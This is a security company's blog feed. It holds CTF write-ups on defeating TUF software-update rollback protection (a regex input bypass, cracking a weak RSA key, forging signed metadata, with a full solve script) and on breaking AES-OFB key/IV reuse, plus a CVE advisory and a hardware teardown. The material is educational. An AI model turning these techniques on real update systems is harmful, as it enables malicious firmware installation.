Uncategorized – Red Balloon Security https://redballoonsecurity.com/ Defend From Within Tue, 20 Aug 2024 02:03:13 +0000 en-US hourly 1 https://wordpress.org/?v=6.8.1 https://redballoonsecurity.com/wp-content/uploads/2021/11/RBS_logo_red-150x150.png Uncategorized – Red Balloon Security https://redballoonsecurity.com/ 32 32 Hacking Secure Software Update Systems at the DEF CON 32 Car Hacking Village https://redballoonsecurity.com/dc32-car-hacking-ctf/ https://redballoonsecurity.com/dc32-car-hacking-ctf/#respond Sun, 18 Aug 2024 20:47:08 +0000 https://redballoonsecurity.com/?p=10068

Hacking Secure Software Update Systems at the DEF CON 32 Car Hacking Village

Red Balloon Security recently returned from the DEF CON hacking conference in Las Vegas, where, among other activities, we brought two computer security challenges to the Car Hacking Village (CHV) Capture The Flag (CTF) competition. The grand prize for the competition was a 2021 Tesla, and second place was several thousand dollars of NXP development kits, so we wanted to make sure our challenge problems were appropriately difficult. This competition was also a “black badge CTF” at DEF CON, which means the winners are granted free entrance to DEF CON for life.

The goal of our challenges was to force competitors to learn about secure software updates and The Update Framework (TUF), which is commonly used for securing software updates. We originally wanted to build challenge problems around defeating Uptane, an automotive-specific variant of TUF, however, there is no well-supported, public version of Uptane that we could get working, so we built the challenges around Uptane’s more general ancestor TUF instead. Unlike Uptane, TUF is well-supported with several up-to-date, maintained, open source implementations.

Our two CTF challenges were designed to be solved in order – the first challenge had to be completed to begin the second. Both involved circumventing the guarantees of TUF to perform a software rollback.

Besides forcing competitors to learn the ins and outs of TUF, the challenges were designed to impress upon them that software update frameworks like TUF are only secure if they are used properly, and if they are used with secure cryptographic keys. If either of these assumptions is violated, the security of software updates can be compromised.

Both challenges ran on a Rivain Telematics Control Module (TCM) at DEF CON.

Challenge 1: Secure Updates are TUF

Challenge participants were given the following information:

  • Category: exploitation, reverse engineering

  • Description: I set up secure software updates using TUF. That way nobody can do a software rollback! Right? To connect, join the network and run:
    nc 172.28.2.64 8002
  • Intended Difficulty: easy

  • Solve Criteria: found flag

  • Tools Required: none

In addition to the description above, participants were given a tarball with the source of the software update script using the python-tuf library, and the TUF repository with the signed metadata and update files served over HTTP to the challenge server, which acts as a TUF client.

The run.sh script to start up the TUF server and challenge server:

				
					#!/bin/sh

set -euxm

# tuf and cryptography dependencies installed in virtual environment
source ~/venv/bin/activate

(python3 -m http.server --bind 0 --directory repository/ 38001 2>&1) | tee /tmp/web_server.log &

while sleep 3; do 
  python3 challenge_server.py --tuf-server http://localhost:38001 --server-port 38002 || fg
done

				
			

The main challenge_server.py:

				
					#!/usr/bin/env -S python3 -u
"""
Adapted from:
https://github.com/theupdateframework/python-tuf/tree/f8deca31ccea22c30060f259cb7ef2588b9c6baa/examples/client
"""


import argparse
import inspect
import json
import os
import re
import socketserver
import sys
from urllib import request

from tuf.ngclient import Updater


def parse_args():
    parser = argparse.ArgumentParser()
    for parameter in inspect.signature(main).parameters.values():
        if parameter.name.startswith("_"):
            continue
        if "KEYWORD" in parameter.kind.name:
            parser.add_argument(
                "--" + parameter.name.replace("_", "-"),
                default=parameter.default,
            )
    return parser.parse_args()


def semver(s):
    return tuple(s.lstrip("v").split("."))


def name_matches(name, f):
    return re.match(name, f)


def readline():
    result = []
    c = sys.stdin.read(1)
    while c != "\n":
        result.append(c)
        c = sys.stdin.read(1)
    result.append(c)
    return "".join(result)


class Handler(socketserver.BaseRequestHandler):
    def __init__(self, *args, tuf_server=None, updater=None, **kwargs):
        self.tuf_server = tuf_server
        self.updater = updater
        super().__init__(*args, **kwargs)

    def handle(self):
        self.request.settimeout(10)
        os.dup2(self.request.fileno(), sys.stdin.fileno())
        os.dup2(self.request.fileno(), sys.stdout.fileno())

        print("Welcome to the firmware update admin console!")
        print("What type of firmware would you like to download from the TUF server?")
        print(
            "Whichever type you pick, we will pull the latest version from the server."
        )
        print("Types:")
        with request.urlopen(f"{self.tuf_server}/targets.json") as response:
            targets = json.load(response)
        all_target_files = list(targets["signed"]["targets"].keys())
        print("-", "\n- ".join({file.split("_")[0] for file in all_target_files}))

        print("Enter type name: ")
        name = readline().strip()
        if "." in name:
            # People were trying to bypass our version check with regex tricks! Not allowed!
            print("Not allowed!")
            return
        filenames = list(
            sorted(
                [f for f in all_target_files if name_matches(name, f)],
                key=lambda s: semver(s),
            )
        )
        if len(filenames) == 0:
            print("Sorry, file not found!")
            return
        filename = filenames[-1]

        print(f"Downloading {filename}")

        info = self.updater.get_targetinfo(filename)
        if info is None:
            print("Sorry, file not found!")
            return

        with open("/dev/urandom", "rb") as f:
            name = f.read(8).hex()
        path = self.updater.download_target(
            info,
            filepath=f"/tmp/{name}.{os.path.basename(info.path)}",
        )
        os.chmod(path, 0o755)

        print(f"Running {filename}")
        child = os.fork()
        if child == 0:
            os.execl(path, path)
        else:
            os.wait()
            os.remove(path)


def main(tuf_server="http://localhost:8001", server_port="8002", **_):
    repo_metadata_dir = "/tmp/tuf_server_metadata"
    if not os.path.isdir(repo_metadata_dir):
        if os.path.exists(repo_metadata_dir):
            raise RuntimeError(
                f"{repo_metadata_dir} already exists and is not a directory"
            )
        os.mkdir(repo_metadata_dir)
        with request.urlopen(f"{tuf_server}/root.json") as response:
            root = json.load(response)
        with open(f"{repo_metadata_dir}/root.json", "w") as f:
            json.dump(root, f, indent=2)

    updater = Updater(
        metadata_dir=repo_metadata_dir,
        metadata_base_url=tuf_server + "/metadata/",
        target_base_url=tuf_server + "/targets/",
    )
    updater.refresh()

    def return_handler(*args, **kwargs):
        return Handler(*args, **kwargs, tuf_server=tuf_server, updater=updater)

    print("Running server")
    with socketserver.ForkingTCPServer(
        ("0", int(server_port)), return_handler
    ) as server:
        server.serve_forever()


if __name__ == "__main__":
    main(**parse_args().__dict__)

				
			

Also included were TUF-tracked files tcmupdate_v0.{2,3,4}.0.py.

The challenge server waits for TCP connections. When one is made, it prompts for a software file to download. Then it checks the TUF server for all versions of that file (using the user input in a regular expression match), and picks the latest based on parsing its version string (for example filename_v0.3.0.py parses to (0, 3, 0) ). Once it has found the latest file, it downloads it using the TUF client functionality from the TUF library.

The goal of this challenge is to roll back from version 0.4.0 to version 0.3.0. The key to solving this challenge is to notice the following code:

				
					# ...

def semver(s):
    return tuple(s.lstrip("v").split("."))

def name_matches(name, f):
    return re.match(name, f)

def handle_tcp():
    # ...

    name = readline().strip()
    if "." in name:
        # People were trying to bypass our version check with regex tricks! Not allowed!
        print("Not allowed!")
        return

    filenames = list(
        sorted(
            [f for f in all_target_files if name_matches(name, f)],
            key=lambda s: semver(s),
        )
    )
    if len(filenames) == 0:
        print("Sorry, file not found!")
        return
    filename = filenames[-1]

    # ...

				
			

This code firsts filters using the regular expression, then sorts based on the version string to find the latest matching file. Notably, the name input is used directly as a regular expression.

To circumvent the logic for only downloading the latest version of a file, we can pass an input regular expression that filters out everything except for the version we want to run. Our first instinct might be to use a regular expression like the following:

tcmupdate.*0\.3\.0.*

If we try that, however, we hit the case where any input including a . character is blocked. We now need to rewrite the regular expression to match only tcmupdate_v0.3.0, but without including the . character. One of many possible solutions is:

tcmupdate_v0[^a]3[^a]0

Since the . literal is a character that is not a, the [^a] expression will match it successfully without including it directly. This input gives us the flag.

flag{It_T4ke$-More-Than_just_TUF_for_secure_updates!}

Challenge 2: One Key to Root Them All

Challenge participants were given the following information:

  • Name: One Key to Root Them All

  • Submitter: Jacob Strieb @ Red Balloon Security

  • Category: crypto, exploitation

  • Description: Even if you roll back to an old version, you’ll never be able to access the versions I have overwritten! TUF uses crypto, so it must be super secure. You will need to have solved the previous challenge to progress to this one. To connect, join the network and run:
    nc 172.28.2.64 8002
  • Intended Difficulty: shmedium to hard

  • Solve Criteria: found flag

  • Tools Required: none

Challenge 2 can only be attempted once challenge 1 has been completed. When challenge 1 is completed, it runs tcmupdate_v0.3.0.py on the target TCM. This prompts the user for a new TUF server address to download files from, and a new filename to download and run. The caveat is that the metadata from the original TUF server is already trusted locally, so attempts to download from a TUF server with new keys will be rejected.

In the challenge files repository/targets subdirectory, there are two versions of tcmupdate_v0.2.0.py. One of them is tracked by TUF, the other is no longer tracked by TUF. The goal is to roll back to the old version of tcmupdate_v0.2.0.py that has been overwritten and is no longer a possible target to download with the TUF downloader.

The challenge files look like this:

				
					ctf/
├── challenge_server.py
├── flag_1.txt
├── flag_2.txt
├── repository
│   ├── 1.root.json
│   ├── 1.snapshot.json
│   ├── 1.targets.json
│   ├── 2.snapshot.json
│   ├── 2.targets.json
│   ├── metadata -> .
│   ├── root.json
│   ├── snapshot.json
│   ├── targets
│   │   ├── 870cba60f57b8cbee2647241760d9a89f3c91dba2664467694d7f7e4e6ffaca588f8453302f196228b426df44c01524d5c5adeb2f82c37f51bb8c38e9b0cc900.tcmupdate_v0.2.0.py
│   │   ├── 9bbef34716da8edb86011be43aa1d6ca9f9ed519442c617d88a290c1ef8d11156804dcd3e3f26c81e4c14891e1230eb505831603b75e7c43e6071e2f07de6d1a.tcmupdate_v0.2.0.py
│   │   ├── 481997bcdcdf22586bc4512ccf78954066c4ede565b886d9a63c2c66e2873c84640689612b71c32188149b5d6495bcecbf7f0d726f5234e67e8834bb5b330872.tcmupdate_v0.3.0.py
│   │   └── bc7e3e0a6ec78a2e70e70f87fbecf8a2ee4b484ce2190535c045aea48099ba218e5a968fb11b43b9fcc51de5955565a06fd043a83069e6b8f9a66654afe6ea57.tcmupdate_v0.4.0.py
│   ├── targets.json
│   └── timestamp.json
├── requirements.txt
└── run.sh

				
			

The latest version of the TUF targets.json file is only tracking the 9bbef3... hash version of the tcmupdate_v0.2.0.py file.

				
					{
  "signed": {
    "_type": "targets",
    "spec_version": "1.0",
    "version": 2,
    "expires": "2024-10-16T21:11:07Z",
    "targets": {
      "tcmupdate_v0.2.0.py": {
        "length": 54,
        "hashes": {
          "sha512": "9bbef34716da8edb86011be43aa1d6ca9f9ed519442c617d88a290c1ef8d11156804dcd3e3f26c81e4c14891e1230eb505831603b75e7c43e6071e2f07de6d1a"
        }
      },
      "tcmupdate_v0.3.0.py": {
        "length": 1791,
        "hashes": {
          "sha512": "481997bcdcdf22586bc4512ccf78954066c4ede565b886d9a63c2c66e2873c84640689612b71c32188149b5d6495bcecbf7f0d726f5234e67e8834bb5b330872"
        }
      },
      "tcmupdate_v0.4.0.py": {
        "length": 125,
        "hashes": {
          "sha512": "bc7e3e0a6ec78a2e70e70f87fbecf8a2ee4b484ce2190535c045aea48099ba218e5a968fb11b43b9fcc51de5955565a06fd043a83069e6b8f9a66654afe6ea57"
        }
      }
    }
  },
  "signatures": [
    {
      "keyid": "f1f66ca394996ea67ac7855f484d9871c8fd74e687ebab826dbaedf3b9296d14",
      "sig": "1bc2be449622a4c2b06a3c6ebe863fad8d868daf78c1e2c2922a2fe679a529a7db9a0888cd98821a66399fd36a4d5803d34c49d61b21832ff28895931539c1cca118b299c995bcd1f7b638803da481cf253e88f4e80d62e7abcc39cc92899cc540be901033793fae9253f41008bc05f70d93ef569c0d6c09644cd7dfb758c2b71e2332de7286d15cc894a51b6a6363dcde5624c68506ea54a426f7ae9055f01760c6d53f4f4f68589d89f31a01e08d45880bc28a279f8621d97ab7223c4d41ecb077176af5dd27d5c07379d99898020b23cd733e"
    }
  ]
}

				
			

Thus, in order to convince the TUF client to download the old version of tcmupdate_v0.2.0.py from a TUF file server we control, we will need to insert the correct hash into targets.json. But if we do that, we will need to resign targets.json, then rebuild and resign snapshot.json, then rebuild and resign timestamp.json. None of these things can be accomplished without the private signing key. This means that we need to crack the signing keys in order to rebuild updated TUF metadata. Luckily, inspecting the root.json file to learn about the keys indicates that the targets, snapshot, and timestamp roles all use the same RSA public-private keypair.

The key for this keypair is generated using weak RSA primes that are close to one another. This makes the key vulnerable to a Fermat factoring attack. The attack can either be performed manually using this technique, or can be performed automatically by a tool like RsaCtfTool.

After the key is cracked, we have to rebuild and resign all of the TUF metadata in sequence. This is most easily done using the go-tuf CLI from version v0.7.0 of the go-tuf library.

go install github.com/theupdateframework/go-tuf/cmd/[email protected]

This CLI expects the keys to be in JSON format and stored in the keys subdirectory (sibling directory of the repository directory). A quick Python script will convert our public and private keys in PEM format into the expected JSON.

				
					import base64
import json
import os
import sys
from nacl.secret import SecretBox
from cryptography.hazmat.primitives.kdf.scrypt import Scrypt

if len(sys.argv) < 3:
    sys.exit(f"{sys.argv[0]} <privkey> <pubkey>")

with open(sys.argv[1], "r") as f:
    private = f.read()

with open(sys.argv[2], "r") as f:
    public = f.read()

plaintext = json.dumps(
    [
        {
            "keytype": "rsa",
            "scheme": "rsassa-pss-sha256",
            "keyid_hash_algorithms": ["sha256", "sha512"],
            "keyval": {
                "private": private,
                "public": public,
            },
        },
    ]
).encode()

with open("/dev/urandom", "rb") as f:
    salt = f.read(32)
    nonce = f.read(24)
n = 65536
r = 8
p = 1

kdf = Scrypt(
    length=32,
    salt=salt,
    n=n,
    r=r,
    p=p,
)
secret_key = kdf.derive(b"redballoon")

box = SecretBox(secret_key)
ciphertext = box.encrypt(plaintext, nonce).ciphertext

print(
    json.dumps(
        {
            "encrypted": True,
            "data": {
                "kdf": {
                    "name": "scrypt",
                    "params": {
                        "N": n,
                        "r": r,
                        "p": p,
                    },
                    "salt": base64.b64encode(salt).decode(),
                },
                "cipher": {
                    "name": "nacl/secretbox",
                    "nonce": base64.b64encode(nonce).decode(),
                },
                "ciphertext": base64.b64encode(ciphertext).decode(),
            },
        },
        indent=2,
    )
)

				
			

Once we have converted all of the keys to the right format, we can run a sequence of TUF CLI commands to rebuild the metadata correctly with the cracked keys.

				
					mkdir -p staged/targets
cp repository/targets/870cba60f57b8cbee2647241760d9a89f3c91dba2664467694d7f7e4e6ffaca588f8453302f196228b426df44c01524d5c5adeb2f82c37f51bb8c38e9b0cc900.tcmupdate_v0.2.0.py staged/targets/tcmupdate_v0.2.0.py
tuf add tcmupdate_v0.2.0.py
tuf snapshot
tuf timestamp
tuf commit

				
			

Then we run our own TUF HTTP fileserver, and point the challenge server at it to get the flag.

flag{Th15_challenge-Left_me-WE4k_in-the_$$KEYS$$}

The final solve script might look something like this:

				
					#!/bin/bash

set -meuxo pipefail

tar -xvzf rbs-chv-ctf-2024.tar.gz
cd ctf

cat repository/root.json \
  | jq \
  | grep -i 'public key' \
  | sed 's/[^-]*\(-*BEGIN PUBLIC KEY-*.*-*END PUBLIC KEY-*\).*/\1/g' \
  | sed 's/\\n/\n/g' \
  > public.pem

python3 ~/Downloads/RsaCtfTool/RsaCtfTool.py --publickey public.pem --private --output private.pem

mkdir -p keys
python3 encode_key_json.py private.pem public.pem > keys/snapshot.json
cp keys/snapshot.json keys/targets.json
cp keys/snapshot.json keys/timestamp.json

mkdir -p staged/targets
cp repository/targets/870cba60f57b8cbee2647241760d9a89f3c91dba2664467694d7f7e4e6ffaca588f8453302f196228b426df44c01524d5c5adeb2f82c37f51bb8c38e9b0cc900.tcmupdate_v0.2.0.py staged/targets/tcmupdate_v0.2.0.py
tuf add tcmupdate_v0.2.0.py
tuf snapshot
tuf timestamp
tuf commit

python3 -m http.server --bind 0 --directory repository/ 8003 &
sleep 3
(
  echo 'tcmupdate_v0[^a]3'
  sleep 3
  echo 'http://172.28.2.169:8003'
  echo 'tcmupdate_v0.2.0.py'
) | nc 172.28.2.64 38002

kill %1

				
			

Conclusion

In addition to the CTF we brought to the DEF CON Car Hacking Village, we also set up a demonstration of our Symbiote host-based defense technology running on Rivian TCMs. These CTF challenges connect to that demo because the firmware rollbacks caused by exploiting the vulnerable CTF challenge application would (in a TCM protected by Symbiote) trigger alerts, and/or be blocked, depending on the customer’s desired configuration.

To reiterate, we hope that CTF participants enjoyed our challenges, and took away a few lessons:

  • Even if TUF is used correctly, logic bugs outside of TUF can be exploited to violate its guarantees

  • Even correct, reference implementations of TUF are vulnerable if the cryptographic keys used are weak

  • Secure software updates are tricky

  • There is no silver bullet in security; complementing secure software updates with on-device runtime attestation like Symbiote creates a layered, defense in depth strategy to ensure that attacks are thwarted
]]>
https://redballoonsecurity.com/dc32-car-hacking-ctf/feed/ 0 10068
Red Balloon Security Identifies Critical Vulnerability in Kratos NGC-IDU https://redballoonsecurity.com/red-balloon-security-identifies-a-critical-vulnerability-in-the-kratos-ngc-idu/ https://redballoonsecurity.com/red-balloon-security-identifies-a-critical-vulnerability-in-the-kratos-ngc-idu/#respond Mon, 04 Dec 2023 05:18:57 +0000 https://redballoonsecurity.com/?p=9733

Red Balloon Security Identifies Critical Vulnerability in Kratos NGC-IDU

CVE-2023-36670 Remotely Exploitable Command Injection Vulnerability.

Introduction

Red Balloon Security Researchers discover and patch vulnerabilities regularly. One such recent discovery is CVE-2023-36670, which affects the Kratos NGC-IDU 9.1.0.4 system. Let’s dive into the details of this security issue.

Vulnerability Details

  • CVE ID: CVE-2023-36670

     

  • Description: A remotely exploitable command injection vulnerability was found on the Kratos NGC-IDU 9.1.0.4.

     

  • Impact: An attacker can execute arbitrary Linux commands as root by sending crafted TCP requests to the device.

Kratos NGC-IDU 9.1.0.4

The Kratos NGC-IDU system is widely used in various industries, including telecommunications, defense, and critical infrastructure. It provides essential network management and monitoring capabilities. However, like any complex software, it is susceptible to security flaws.

Exploitation Scenario

  1. Crafted TCP Requests: An attacker sends specially crafted TCP requests to the vulnerable Kratos NGC-IDU device.

     

  2. Command Injection: Due to inadequate input validation, the attacker injects malicious commands into the system.

     

  3. Root Privileges: The injected commands execute with root privileges, granting the attacker full control over the device.

Mitigation

  • Patch: Organizations using Kratos NGC-IDU 9.1.0.4 should apply the latest security updates promptly.

     

  • Network Segmentation: Isolate critical devices from the public network to reduce exposure.

     

  • Access Controls: Implement strict access controls to limit who can communicate with the device.

     

  • Monitoring: Monitor network traffic for suspicious activity.

Conclusion

In modern infrastructure, devices such as the Kratos NGC-IDU are at the intersection of incredible value and escalating threat. Despite functionality that is often mission critical and performance that is highly visible, these devices can be insufficiently protected, making them an inviting target.  CVE-2023-36670 highlights the importance of timely patching and robust security practices. Organizations must stay vigilant, continuously assess their systems, and take proactive measures to protect against vulnerabilities.

At Red Balloon, we solve the device vulnerability gap by building security from the inside out, putting customers’ strongest line of defense at their most critical point. Red Balloon’s embedded security solutions enable customers to solve the device vulnerability gap where the greatest damage can happen and the least security exists.

For more information, refer to the official CVE-2023-36670 entry, or contact [email protected]

]]>
https://redballoonsecurity.com/red-balloon-security-identifies-a-critical-vulnerability-in-the-kratos-ngc-idu/feed/ 0 9733
Hacking In-Vehicle Infotainment Systems with OFRAK 3.2.0 at DEF CON 31 https://redballoonsecurity.com/ofrak-at-defcon31/ https://redballoonsecurity.com/ofrak-at-defcon31/#respond Mon, 28 Aug 2023 21:52:49 +0000 https://redballoonsecurity.com/?p=9144

Hacking In-Vehicle Infotainment Systems with OFRAK 3.2.0 at DEF CON 31

Two weeks ago, Red Balloon Security attended DEF CON 31 in Las Vegas, Nevada. In addition to sponsoring and partnering with the Car Hacking Village, where we showed off some of our latest creations, we contributed two challenges to the Car Hacking Village Capture the Flag (CTF) competition. This competition was a “black badge CTF” at DEF CON, which means the winners are granted free entrance to DEF CON for life.

Since it’s been a little while since DEF CON ended, we figured we’d share a write-up of how we would go about solving the challenges. Alternatively, here is a link to an OFRAK Project (new feature since OFRAK 3.2.0!) that includes an interactive walkthrough of the challenge solves.

Challenge 1: Inside Vehicle Infotainment (IVI)

Description: Find the flag inside the firmware, but don’t get tricked by the conn man, etc.

CTF participants start off with a mysterious, 800MB binary called ivi.bin. The description hints that the file is firmware of some sort, but doesn’t give much more info than that. IVI is an acronym for “In Vehicle Infotainment,” so we expect that the firmware will need to support a device with a graphical display and some sort of application runtime, but it is not yet clear that that info will be helpful.

To begin digging into the challenge, the first thing we do is to unpack the file with OFRAK. Then, we load the unpacked result in the GUI for further exploration.

				
					# Install OFRAK
python3 -m pip install ofrak ofrak_capstone ofrak_angr

# Unpack with OFRAK and open the unpacked firmware in the GUI
ofrak unpack --gui --backend angr ./ivi.bin

				
			

When the GUI opens, we see that the outermost layer that has been unpacked is a GZIP. By selecting the only child of the GZIP in the resource tree, and then running “Identify,” we can see that OFRAK has determined that the decompressed file is firmware in Intel Hex format.

Luckily, OFRAK has an Intel Hex unpacker built-in, so we can unpack this file to keep digging for the flag.

OFRAK unpacks the Ihex into an IhexProgram. At this point, we’re not sure if what we’re looking at is actually a program, or is a file that can unpack further. Looking at the metadata from OFRAK analysis in the bottom left pane of the GUI, we note that the file has only one, large segment. This suggests that it is not a program, but rather some other file packed up in IHEX format.

If we run “Identify” on the unpacked IhexProgram, OFRAK confirms that the “program” is actually GZIP compressed data.

To gather more information, we can make OFRAK run Binwalk analysis. This will happen automatically when clicking the “Analyze” button, or we can use the “Run Component” button to run the Binwalk analyzer manually.

Binwalk tends to have a lot of false positives, but in this case, it confirms that this resource is probably a GZIP. Since we know this, we can use the “Run Component” interface to run the GzipUnpacker and see what is inside.

Running “Identify” on the decompressed resource shows that there was a TAR archive inside. Since OFRAK can handle this easily, we click “Unpack” on the TAR. Inside of the archive, there are three files:

  • qemu.sh
  • bzImage
  • agl-ivi-demo-platform-html5-qemux86-64.ext4
 

The first file is a script to emulate the IVI system inside QEMU. The second file is the kernel for the IVI system. And the third file is the filesystem for the IVI.

Based on the bzImage kernel, the flags for QEMU in the script, and the EXT4 filesystem format, we can assume that the IVI firmware is Linux-based. Moreover, we can guess that AGL in the filename stands for “Automotive Grade Linux,” which is a big hint about what type of Linux applications we’ll encounter when we delve deeper.

Since the description talks about “conn man” and “etc,” we have a hint that it makes sense to look for the flag in the filesystem, instead of the kernel.

OFRAK has no problem with EXT filesystems, so we can select that resource and hit “Unpack” to explore this firmware further.

From here, there are two good paths to proceed. The easiest one is to use OFRAK’s new search feature to look for files containing the string flag{, which is the prefix for flags in this competition.

The second is to notice that in the hint, it mentions etc and connman, both of which are folders inside the AGL filesystem.

Navigating into the /etc/connman folder, we see a file called flag1.txt. Viewing this gives us the first flag!

flag{unp4ck_b33p_b00p_pack}

Challenge 2: Initialization Vector Infotainment (IVI)

Description: IVe heard there is a flag in the mechanic area, but you can’t decrypt it without a password… Right?

The hint provided with the challenge download makes it clear that this second challenge is in the same unpacked firmware as the first one. As such, the natural first step is to go looking for the “mechanic area” to find the flag.

One option is to use the qemu.sh script to try and emulate the IVI. Then it might become apparent what the description means by “mechanic area.” However, this is not necessary if you know that “apps” for Automotive Grade Linux are stored in /usr/wam_apps/<app name> in the filesystem.

Navigating directly to that directory, we can see that there is an app called html5-mecharea. One subdirectory of that folder is called chunks, and contains many files with the name flag.XXX.png. This is a pretty good hint that we’re on the right track.

The only problem is that if we try to view any of those PNG files, they appear corrupted.

Poking around the folder a bit more, we see two useful files: create.go, and app/src/App.svelte. It looks like create.go was used to break an image with the flag into chunks, and then encrypt them separately. App.svelte is responsible for taking a password from a user, and using that to try and decrypt the chunks into a viewable image.

create.go seems to be a Golang program to generate a (truly) random password string, use PBKDF2 to generate an AES key from the password, generate a truly random IV, break an image into 1024-byte chunks, encrypt each chunk with AES in OFB mode using the same key and IV, and then dump the encrypted chunks to disk.

Similarly, App.svelte does the inverse process: get a passphrase from a user, do PBKDF2 key derivation, load chunks of an image and try to decrypt them, then concatenate and display the decrypted result.

Looking at these two source files, it’s not apparent that the implementation of randomness or the crypto functions themselves are unsafe. Instead, the most eyebrow-raising aspect (as hinted by the challenge description and title) is the reuse of the same key and Initialization Vector for every chunk of plaintext.

In the OFB mode of AES, the key and IV are the inputs to the AES block cipher, and the output is chained into the next block. Then all of the blocks are used as the source of randomness for a one-time pad. Specifically, they are XORed with the plaintext to get the ciphertext. In other words, the same key and IV generate the same “randomness,” which is then XORed with each plaintext chunk to make a ciphertext chunk.

One fun feature of the XOR function is that any value is its own inverse under XOR. The XOR function is also commutative and associative. This means that the following is true if rand_1 == rand_2, which they will be because the same key and IV generate the same randomness:

cipher_1 XOR cipher_2 == (plain_1 XOR rand_1) XOR (plain_2 XOR rand_2) 
                      == (plain_1 XOR plain_2) XOR (rand_1 XOR rand_2) 
                      == (plain_1 XOR plain_2) XOR 0000000 ... 0000000
                      == plain_1 XOR plain_2

To reiterate: the resuse of the same key and IV tell us that the rand_N values will be the same for all of the ciphertexts. This tells us that the result of XORing any two ciphertexts together (when the same key and IV are used in OFB mode) is the two plaintexts XORed together.

Luckily, based on a closer inspection of the source, one of the chunks is saved unencrypted in the chunks folder. This is used in the code for determining if the passphrase is correct, and that the beginning of the image was successfully decrypted. But we can use it to XOR out the resulting parts of the plaintext. Therefore, we are able to do the following for every ciphertext chunk number N to eventually get back all of the plain text:

plain_1 XOR cipher_1 XOR cipher_N == plain_1 XOR (plain_1 XOR plain_N)
(by above reasoning) == (plain_1 XOR plain_1) XOR plain_N == 00000000 ... 00000000 XOR plain_N == plain_N

The last step is to write a little code to do this for us. A simple solution in Golang is included below, but should be straightforward to do in your favorite programming language.

				
					package main

import (
	"crypto/aes"
	"crypto/subtle"
	"os"
	"sort"
)

func main() {
	outfile, _ := os.Create("outfile.png")

	os.Chdir("chunks")
	chunkdir, _ := os.Open(".")
	filenames, _ := chunkdir.Readdirnames(0)
	sort.Strings(filenames)

	var lastEncrypted []byte = nil
	lastDecrypted, _ := os.ReadFile("flag.unencrypted.png")
	for _, filename := range filenames {
		if filename == "flag.unencrypted.png" {
			continue
		}

		data, _ := os.ReadFile(filename)
		encryptedData := data[aes.BlockSize:]
		xorData := make([]byte, len(encryptedData))

		if lastEncrypted != nil {
			outfile.Write(lastDecrypted)
			subtle.XORBytes(xorData, encryptedData, lastEncrypted)
			subtle.XORBytes(lastDecrypted, lastDecrypted, xorData)
		}

		lastEncrypted = encryptedData
	}

	outfile.Write(lastDecrypted)
	outfile.Close()
}

				
			

When we do this and concatenate all of the plaintexts in the right order, we get a valid PNG image that contains the flag.

flag{cr4sh_syst3ms_n0t_c4rs}

Brief Tour of OFRAK 3.2.0

In the meantime, we published OFRAK 3.2.0 to PyPI on August 10!

 

As always, a detailed list of changes can be viewed in the OFRAK Changelog.

 

We’ve had several new features and quality of life improvements since our last major release.

Projects

OFRAK 3.2.0 introduces OFRAK Projects. Projects are collections of OFRAK scripts and binaries that help users organize, save, and share their OFRAK work. Acessable from the main OFRAK start page, users can now create, continue or clone an OFRAK project with ease. With an OFRAK Project you can run scripts on startup, easily access them from the OFRAK Resource interface, and link them to their relavent binaries. Open our example project to get started and then share your projects with the world, we can’t wait to see what you make!

Search Bars

OFRAK 3.2.0 also introduces a long awaited feature, search bars. Two new search bars are available in the OFRAK Resource interface, one in the Resource Tree pane, and one in the Hex View pane. Each search bar allows the user to search for exact, case insensitive, or regular expression strings and bytes. The Resource Tree search bar will filter the tree for resources containing the search query while the Hex View search bar will scroll to and itereate on the instances of the query. The resource search functionality is also available in the python API using resource.search_data.

Additional Changes

  • Jefferson Filesystem (JFFS) packing/repacking support.
  • Intel Hex (ihex) packing/repacking support (useful for our Car Hacking Village DEFCON challenges).
  • EXT versions 2 – 4 packing/repacking support.

Learn More at OFRAK.COM

]]>
https://redballoonsecurity.com/ofrak-at-defcon31/feed/ 0 9144
Baets by Der https://redballoonsecurity.com/baets/ https://redballoonsecurity.com/baets/#respond Thu, 22 Sep 2022 22:14:23 +0000 https://redballoonsecurity.com/?p=7712

Baets by Der

Baets by Der

Friendly advice from Red Balloon Security: Just pay the extra $2

Recently, we wanted to use some wired headphones with an iPhone, which sadly lacks a headphone jack. The nearest deli offered a solution: a Lightning-to-headphone jack adapter for only $7. Got to love your local New York City bodega. 

 

But a wrinkle appeared: Plugging in the adapter made the phone pop up a dialog to pair with a BeatsX device, which changed to “Baets” once a Bluetooth connection was established. Shouldn’t this thing be a simple digital-to-analog converter? Why is Bluetooth involved? What makes the iPhone think it’s from Beats? That’s too many questions to ignore: We had to dig into this unexpected embedded device.
  

And here’s the short-take of our analysis: Beware the transposed vowels. “Baets” is not what it would want you to believe it is. 

Once connected, the headphones work as if directly plugged into the phone. But we found that Bluetooth must remain on to keep listening, and the phone insists it is connected to a Bluetooth device, called “Baets.” We also noticed the phone’s battery draining much faster than usual.
 

This mysterious behavior piqued our interest. Red Balloon specializes in embedded security and reverse engineering, so interest gave way to action. We promptly bought a dozen more of the same adapter model to tear down and study.

Table of Contents

MFi is MIA

The first thing we noted is none of these adapters had the Apple Made for iPhone/iPad (MFi) chip you’ll find in genuine, approved accessories and cables. Apple licenses that chip to control who is allowed to produce Lightning devices. Instead, each of these knock-off adapters draws power from the Apple device to power its own Bluetooth module. The module then broadcasts that it is ready to pair with the Apple device, though in fact any nearby device can now pair with it and play audio. 

 

Presumably, using Bluetooth is cheaper than licensing Apple’s chip, which is why the knockoffs costs $2 less than the genuine Apple version.

 

This initial finding fueled two research objectives: 1) To discover how the adapter convinced the Apple device to power the module; and 2) to discover how the adapter displayed the pop-up window.

How does it receive power?

We encountered three different hardware configurations on these devices; they appear to have many similarities, but it’s unclear if the same manufacturer makes them. One of the variations does not work: It doesn’t appear to power up, generates no pop-ups, and has no Bluetooth Classic connection. But this variation successfully draws power from the Apple device, so the failure is likely in the circuit or Bluetooth chip. 

 

Overall, the hardware is not very complex and lacks components seen in a genuine adapter, including protection circuitry.

 


First working counterfeit: Lightning to headphone jack

Second working counterfeit: Lightning to headphone jack

Third counterfeit: Lightning to  headphone jack (non-functional, not working)
 
Legitimate Apple adapter. Credit: iFixit


One side of the PCB is the Bluetooth chip and antenna on the active adapters. On the other side is a crystal oscillator clock, which connects to the Bluetooth chip. The chip connects to the accessory power (ACC_PWR) pin of the Lightning connector but does not automatically receive power. The final chip negotiates with the Apple device to draw power through the Lightning port. This negotiation chip is vital to enabling power for the Bluetooth module. 

 

Lightning Connector pinout according to patent filing:
https://web.archive.org/web/20190801205452/http://ramtin-amin.fr/tristar.html 

 

